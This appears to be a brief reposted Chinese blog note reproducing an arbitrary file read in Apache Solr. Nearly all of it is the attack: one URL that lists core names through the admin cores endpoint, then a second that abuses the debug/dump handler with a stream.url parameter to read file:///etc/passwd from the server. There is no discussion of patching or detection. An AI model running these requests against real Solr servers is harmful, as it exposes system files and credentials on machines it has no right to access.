当前位置:网站首页>Apache Solr 任意文件读取复现

Apache Solr 任意文件读取复现

2022-06-23 07:18:00 时光凉春衫薄

Apache Solr

然后访问这个目录就可以拿到当前db的名字   http://[ip]/solr/admin/cores?indexInfo=false&wt=json

然后把得到的名字在这个url中替换掉就可以任意的读取文件

http://[IP]/solr/[name]/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd

 

原网站

版权声明
本文为[时光凉春衫薄]所创,转载请带上原文链接,感谢
https://blog.csdn.net/qq_38656841/article/details/115553043